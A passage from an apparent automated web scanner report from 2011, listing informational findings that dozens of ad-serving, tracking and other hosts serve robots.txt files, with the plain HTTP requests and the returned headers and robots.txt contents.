Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.83. http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oas.guardian.co.uk
Path:   /adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oas.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:59:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jan 2008 16:38:45 GMT
ETag: "7429ed-1a-442d407034f40"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

27.84. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1442444284@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1442444284@Top

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oasc12.247realmedia.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:39:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jan 2008 16:38:45 GMT
ETag: "13624e-1a-442d407034f40"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

27.85. http://optout.33across.com/api/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.33across.com
Path:   /api/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: optout.33across.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:07:44 GMT
Server: Apache
Last-Modified: Fri, 25 Feb 2011 23:38:53 GMT
Accept-Ranges: bytes
Content-Length: 42
Cache-Control: max-age=1209600, proxy-revalidate
Expires: Sun, 18 Sep 2011 11:07:44 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /
Disallow: /api/

27.86. http://optout.cognitivematch.com/optoutStatus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.cognitivematch.com
Path:   /optoutStatus

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: optout.cognitivematch.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"81-1304607390000"
Last-Modified: Thu, 05 May 2011 14:56:30 GMT
Content-Type: text/plain
Content-Length: 81
Date: Sun, 04 Sep 2011 11:00:28 GMT
Connection: close

# Disallow robots to index any part of our contents
User-agent: *
Disallow: /

27.87. http://optout.crwdcntrl.net/optout/check.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout/check.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: optout.crwdcntrl.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:01:43 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Tue, 14 Dec 2010 16:21:02 GMT
ETag: "161850d-1a-4976134e6b780"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

27.88. http://optout.invitemedia.com:9030/check_optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.invitemedia.com:9030
Path:   /check_optout

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: optout.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 04 Sep 2011 11:02:10 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

27.89. http://optout.media6degrees.com/orbserv/NAIStatus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.media6degrees.com
Path:   /orbserv/NAIStatus

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: optout.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"36-1307635301000"
Last-Modified: Thu, 09 Jun 2011 16:01:41 GMT
Content-Type: text/plain
Content-Length: 36
Date: Sun, 04 Sep 2011 10:59:59 GMT
Connection: close

# go away
User-agent: *
Disallow: /

27.90. http://optout.mxptint.net/naistatus.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mxptint.net
Path:   /naistatus.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: optout.mxptint.net

Response

HTTP/1.1 200 OK
Content-Length: 29
Content-Type: text/plain
Last-Modified: Fri, 04 Dec 2009 21:27:35 GMT
Accept-Ranges: bytes
ETag: "c8dd2982875ca1:24e1"
Server: Microsoft-IIS/6.0
Date: Sun, 04 Sep 2011 11:03:18 GMT
Connection: close

...User-agent: *
Disallow: /

27.91. http://p.opt.fimserve.com/nai_check.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.opt.fimserve.com
Path:   /nai_check.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: p.opt.fimserve.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1205261468000"
Last-Modified: Tue, 11 Mar 2008 18:51:08 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 04 Sep 2011 11:06:39 GMT
Connection: keep-alive

User-agent: *
Disallow: /

27.92. http://p4.cbzp2o4y2l4dq.jfb647l4x6a6smpk.714851.s1.v4.ipv6-exp.l.google.com/gen_204  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p4.cbzp2o4y2l4dq.jfb647l4x6a6smpk.714851.s1.v4.ipv6-exp.l.google.com
Path:   /gen_204

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: p4.cbzp2o4y2l4dq.jfb647l4x6a6smpk.714851.s1.v4.ipv6-exp.l.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 04:17:57 GMT
Expires: Sun, 04 Sep 2011 04:17:57 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.93. http://pagead2.googlesyndication.com/pagead/imgad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 02:08:36 GMT
Expires: Mon, 05 Sep 2011 02:08:36 GMT
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 1308

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

27.94. http://pbid.pro-market.net/engine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pbid.pro-market.net
Path:   /engine

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pbid.pro-market.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: tapp2.ny
ETag: W/"27-1312809562000"
Last-Modified: Mon, 08 Aug 2011 13:19:22 GMT
Content-Type: text/plain
Content-Length: 27
Date: Sun, 04 Sep 2011 10:59:02 GMT
Connection: close

User-agent: *
Disallow: /


27.95. http://picasaweb.google.com/lh/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /lh/view

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: picasaweb.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 04:17:58 GMT
Expires: Sun, 04 Sep 2011 04:17:58 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Allow: /lh/albumList
Allow: /lh/album
Allow: /lh/favorites
Allow: /lh/idredir
Allow: /lh/photo
Allow: /lh/sredir
Disallow: /lh/

27.96. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:36:24 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 23:52:42 GMT
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /


27.97. http://pixel.adblade.com/log.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.adblade.com
Path:   /log.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.adblade.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "2884875378"
Last-Modified: Fri, 21 Aug 2009 13:46:26 GMT
Content-Length: 28
Connection: close
Date: Sun, 04 Sep 2011 02:41:23 GMT
Server: lighttpd/1.4.21

User-agent: *
Disallow: /

27.98. http://pixel.fetchback.com/serve/fb/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/optout

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:23:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

27.99. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-e4m3Yko6bFYVc.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 02:38:59 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 04 Sep 2011 02:38:59 GMT
Server: QS

User-agent: *
Disallow: /

27.100. http://pr.prchecker.info/getpr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pr.prchecker.info
Path:   /getpr.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pr.prchecker.info

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:34:34 GMT
Server: Apache
Last-Modified: Fri, 30 Nov 2007 11:27:43 GMT
ETag: "8223e1-19-44023b81109c0"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

27.101. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://premiumtv.122.2o7.net
Path:   /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: premiumtv.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:22:19 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "19114-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www30
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.102. http://profile.live.com/badge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.live.com
Path:   /badge

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: profile.live.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
X-Imf: 73e04764-eaa3-40e8-9316-bcee618a65c4
Set-Cookie: E=P:G+Ioy9A4zog=:PDtPFKQyOsnycKkcAMrHfU3oRlhGCCuIQABcQXPNrDE=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: sc_clustbl_142=f94bca962840136d; domain=profile.live.com; expires=Tue, 04-Oct-2011 04:18:11 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BAYXXXXXC547 V: 1 D: 8/14/2011
Date: Sun, 04 Sep 2011 04:18:10 GMT
Connection: close
Content-Length: 44

...User-agent: *
Disallow: /applications/

27.103. http://property.ndtv.com/ndtv_redirect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://property.ndtv.com
Path:   /ndtv_redirect.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: property.ndtv.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:18:14 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 07:35:10 GMT
ETag: "8b218c-bd-49fc255468780"
Accept-Ranges: bytes
Content-Length: 189
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# Filename:robots.txt file for http://www.indiaproperty.com/
# Created April 14, 2009.

Sitemap: http://www.indiaproperty.com/sitemap.xml

User-agent: *
Disallow:/organic/
Crawl-delay: 100

27.104. http://pubads.g.doubleclick.net/gampad/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 04:18:15 GMT
Expires: Mon, 05 Sep 2011 04:18:15 GMT
Cache-Control: public, max-age=86400
Server: cafe
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

27.105. http://r.casalemedia.com/rum  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /rum

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Aug 2010 18:07:58 GMT
ETag: "11483aa-1a-d4357b80"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Expires: Sun, 04 Sep 2011 02:40:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 02:40:07 GMT
Connection: close

User-agent: *
Disallow: /

27.106. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sun, 04 Sep 2011 02:41:28 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

27.107. http://r1-ads.ace.advertising.com/site=804611/size=300250/u=2/bnum=36466465/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=804611/size=300250/u=2/bnum=36466465/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r1-ads.ace.advertising.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 04 Sep 2011 03:03:34 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 04 Sep 2011 03:03:34 GMT
Connection: close

User-agent: *
Disallow: /

27.108. http://r1.zedo.com/log/ERR.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1.zedo.com
Path:   /log/ERR.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r1.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Thu, 11 Sep 2008 04:30:19 GMT
ETag: "3e4e4ae-4c-4569739f12cc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Sun, 04 Sep 2011 02:42:38 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

27.109. http://s.xp1.ru4.com/coop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /coop

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 04 Sep 2011 11:05:23 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/plain
Last-modified: Fri, 31 Jul 2009 18:32:10 GMT
Content-length: 26
Etag: "1a-4a7338aa"
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /

27.110. http://s.ytimg.com/yt/swfbin/cps-vflNVWyCR.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.ytimg.com
Path:   /yt/swfbin/cps-vflNVWyCR.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s.ytimg.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 27 Aug 2010 02:31:32 GMT
Date: Sun, 04 Sep 2011 11:08:05 GMT
Expires: Sun, 04 Sep 2011 11:08:05 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 37
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

27.111. http://s0.2mdn.net/2230348/IN2033_Earth_728_E.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /2230348/IN2033_Earth_728_E.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 04 Sep 2011 02:33:49 GMT
Expires: Mon, 05 Sep 2011 02:33:49 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /

27.112. http://scholar.google.com/scholar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scholar.google.com
Path:   /scholar

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: scholar.google.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 04:18:40 GMT
Expires: Mon, 05 Sep 2011 04:18:40 GMT
Cache-Control: public, max-age=86400
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 19:25:15 GMT
X-Content-Type-Options: nosniff
Server: scholar
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.113. http://search.spotxchange.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.spotxchange.com
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.spotxchange.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:19:24 GMT
Server: Apache
Last-Modified: Mon, 28 Feb 2011 23:42:39 GMT
ETag: "14685e2-406a-4d6c32ef"
Accept-Ranges: bytes
Content-Length: 16490
Connection: close
Content-Type: text/plain

#
# IAB_ABCe_International_Spiders_and_Robots_200612
#
# December 20, 2006
#
# **********COMMENTS SECTION***************************************************
#
# This list has been reviewed by the IAB
...[SNIP]...

27.114. http://search.twitter.com/search.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.twitter.com
Path:   /search.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:16 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 18:04:30 GMT
Accept-Ranges: bytes
Content-Length: 45
Cache-Control: max-age=86400
Expires: Mon, 05 Sep 2011 02:25:16 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /search
Disallow: /*?

27.115. http://server3.yowindow.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server3.yowindow.com
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: server3.yowindow.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:31:16 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Mon, 11 Jan 2010 21:07:26 GMT
ETag: "18c266-1a-47ce9eca05f80"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

27.116. http://shopping.indiatimes.com/ism/faces/tracker.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.indiatimes.com
Path:   /ism/faces/tracker.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: shopping.indiatimes.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:18:45 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.23
Last-Modified: Mon, 17 May 2010 08:19:34 GMT
ETag: "45f0d2-2f-486c5e286b180"
Accept-Ranges: bytes
Content-Length: 47
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Disallow: /*search.jsp*

27.117. https://sites.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sites.google.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sites.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Pragma: no-cache
Date: Sun, 04 Sep 2011 04:18:48 GMT
Expires: Sun, 04 Sep 2011 04:18:48 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /feeds
Disallow: /*/_/

27.118. http://social.ndtv.com/static/Comment/List/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /static/Comment/List/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: social.ndtv.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
ETag: "40d010-32-4833ed16460c3"
Last-Modified: Fri, 02 Apr 2010 10:55:31 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Cache-Control: max-age=1175036
Expires: Sat, 17 Sep 2011 17:06:58 GMT
Date: Sun, 04 Sep 2011 02:43:02 GMT
Content-Length: 50
Connection: close

User-agent: *
Disallow: /tbModel/
Disallow: /ajax/

27.119. http://srv.clickfuse.com/pixels/create.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://srv.clickfuse.com
Path:   /pixels/create.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: srv.clickfuse.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Date: Sun, 04 Sep 2011 03:59:22 GMT
ETag: "ec2db-1a-4aaae79014380"
Last-Modified: Wed, 17 Aug 2011 07:30:38 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

27.120. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.30.147.196
X-Cnection: close
Date: Sun, 04 Sep 2011 04:01:08 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

27.121. http://swf.yowindow.com/wimo/hpPal/hpPal.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://swf.yowindow.com
Path:   /wimo/hpPal/hpPal.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: swf.yowindow.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:29:49 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Mon, 11 Jan 2010 21:07:26 GMT
ETag: "18c266-1a-47ce9eca05f80"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

27.122. http://sync.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xca7 3239
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

27.123. http://t4.liverail.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t4.liverail.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: t4.liverail.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "2181919318"
Last-Modified: Mon, 22 Aug 2011 16:57:51 GMT
Content-Length: 27
Date: Sun, 04 Sep 2011 03:20:41 GMT
Server: lighttpd/1.4.28

User-agent: *
Disallow: /


27.124. http://tag.admeld.com/match  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /match

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Last-Modified: Wed, 31 Aug 2011 21:42:54 GMT
ETag: "e880243-1a-4abd402b9f380"
Accept-Ranges: bytes
Content-Length: 26
